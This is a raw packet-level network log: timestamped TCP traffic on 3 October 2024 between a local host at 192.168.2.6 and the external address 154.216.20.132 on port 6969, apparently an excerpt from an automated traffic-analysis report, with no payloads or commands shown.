                                          Oct 3, 2024 14:55:11.145828009 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:11.150840998 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:11.150906086 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:11.155812979 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:11.526243925 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:11.605341911 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:11.684154987 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:11.732424021 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:11.737394094 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:11.737462997 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:11.742429018 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:12.111187935 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:12.152288914 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:12.263216972 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:12.308604956 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:12.346839905 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:12.346839905 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:12.351902962 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:12.351916075 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:12.352075100 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:12.731535912 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:12.777355909 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:12.887407064 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:12.933479071 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:12.953589916 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:12.953640938 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:12.958503962 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:12.958563089 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:12.958568096 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.181217909 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.230420113 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:13.340454102 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.386558056 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:13.386850119 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:13.386924028 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:13.391457081 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.391647100 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.391711950 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.391735077 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.391743898 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.391755104 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.391948938 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.391957998 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.391968012 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.392003059 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.396183968 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.396195889 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.396327972 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.396337032 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.396450996 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.396465063 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.396471024 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.396481991 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.719928980 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.762490988 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:13.871855021 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.917953968 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:13.991341114 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:13.991465092 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:13.996253014 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.996320963 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:13.996344090 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.996365070 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.996373892 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.996445894 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.996454000 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.996567011 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.996598005 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.996607065 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.996614933 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.996761084 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.996769905 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.996828079 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:13.996987104 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:14.002501965 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:14.002599955 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:14.247077942 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:14.292824030 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:14.402885914 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:14.432842016 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:14.437707901 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:14.437807083 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:14.442799091 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:14.809209108 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:14.855588913 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:14.965440989 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:14.994731903 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:15.000195026 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:15.002485037 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:15.007816076 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:15.448527098 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:15.496037006 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:15.714391947 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:15.760580063 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:16.058531046 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:16.667820930 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:16.760201931 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:16.760481119 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:16.765933990 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:16.765993118 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:16.768779993 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:16.768795013 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:16.768821955 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:16.980429888 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:17.027461052 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:17.152880907 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:17.197792053 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:17.202841043 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:17.202925920 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:17.207835913 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:17.578854084 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:17.621162891 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:17.746793032 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:17.775816917 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:17.780895948 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:17.781024933 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:17.786067963 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:18.156155109 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:18.200351000 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:18.311228991 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:18.354397058 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:18.359513998 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:18.360414982 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:18.365518093 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:18.728677988 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:18.777334929 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:18.890892982 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:18.917123079 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:18.922173023 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:18.922259092 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:18.927145004 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:19.996653080 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:19.998014927 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:19.998090029 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:19.998258114 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:19.998326063 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:19.999119997 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:19.999171972 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:20.027127981 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:20.032097101 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:20.032166004 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:20.037053108 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:20.411115885 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:20.464715958 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:20.574943066 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:20.619908094 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:20.624893904 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:20.624978065 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:20.629925966 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:20.995656967 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:21.042889118 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:21.169594049 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:21.203807116 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:21.208784103 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:21.212459087 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:21.217485905 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:21.591054916 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:21.636612892 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:21.747035027 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:21.792866945 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:21.810084105 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:21.810128927 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:21.815191031 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:21.815243959 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:21.815337896 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:21.820316076 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:21.820379019 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:21.820409060 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:21.820457935 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:21.825232983 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:21.825328112 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:21.825326920 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:21.830176115 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:22.148276091 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:22.199199915 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:22.309338093 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:22.340413094 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:22.340413094 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:22.345449924 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:22.345458031 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:22.345468044 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:22.562176943 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:22.605295897 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:22.731041908 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:22.760077953 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:22.764875889 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:22.764970064 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:22.769778967 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:23.134851933 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:23.183429003 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:23.293936968 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:23.322449923 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:23.329382896 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:23.329462051 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:23.334361076 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:23.697171926 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:23.745913982 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:23.858792067 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:23.883567095 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:23.888468981 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:23.888539076 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:23.893405914 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:24.257920980 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:24.308551073 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:24.419053078 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:24.463483095 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:24.463525057 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:24.469741106 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:24.469759941 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:24.469764948 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:24.691484928 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:24.746089935 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:24.856179953 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:24.902201891 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:24.918581963 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:24.918613911 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:24.923495054 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:24.923504114 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:24.923610926 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.143860102 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.199242115 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:25.309516907 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.343405008 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:25.343405008 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:25.348243952 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.348278999 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.348290920 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.348299980 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.682622910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.730334044 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:25.846721888 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.886564970 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:25.888151884 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:25.888200998 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:25.894331932 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.894442081 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.894454956 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.894475937 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.894524097 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:25.899348021 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:25.899446011 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:26.218923092 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:26.277290106 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:26.371948957 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:26.417840004 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:26.420428038 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:26.420466900 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:26.425411940 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:26.425422907 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:26.425436020 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:26.425441980 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:26.764069080 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:26.808549881 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:26.962882996 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:26.994699001 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:27.001061916 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:27.002238035 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:27.008553028 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:27.447494984 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:27.495960951 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:27.543761015 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:27.572160006 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:27.578862906 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:27.578973055 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:27.584825993 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:27.947313070 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:27.995949030 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:28.143697977 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.167402029 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:28.169961929 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:28.172314882 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.174968958 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.174976110 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.174989939 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.175093889 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:28.179995060 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.180001974 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.180015087 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.180080891 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:28.184895039 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.507100105 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.558439016 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:28.668667078 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.698537111 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:28.699024916 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:28.703439951 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.704086065 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.704127073 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.938265085 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:28.980341911 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:29.095180988 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:29.136563063 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:29.154973984 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:29.159795046 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:29.159852028 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:29.164673090 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:29.551035881 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:29.605336905 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:29.700093985 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:29.729105949 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:29.733995914 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:29.734113932 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:29.739017010 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:30.112318039 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:30.152179956 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:30.262846947 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:30.306202888 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:30.311342001 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:30.311553955 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:30.316426039 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:30.687172890 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:30.730494022 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:30.840852022 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:30.868932009 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:30.873802900 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:30.874182940 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:30.879000902 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.250551939 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.296351910 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:31.403160095 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.431993961 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:31.436966896 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.437177896 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:31.442025900 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.815601110 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.870929956 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:31.966012001 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.993632078 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:31.999042034 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.999175072 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:32.004306078 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:32.531357050 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:32.532365084 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:32.532469988 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:32.555737019 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:32.562886953 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:32.562962055 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:32.569912910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:32.933862925 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:32.980361938 CEST591726969192.168.2.6154.216.20.132
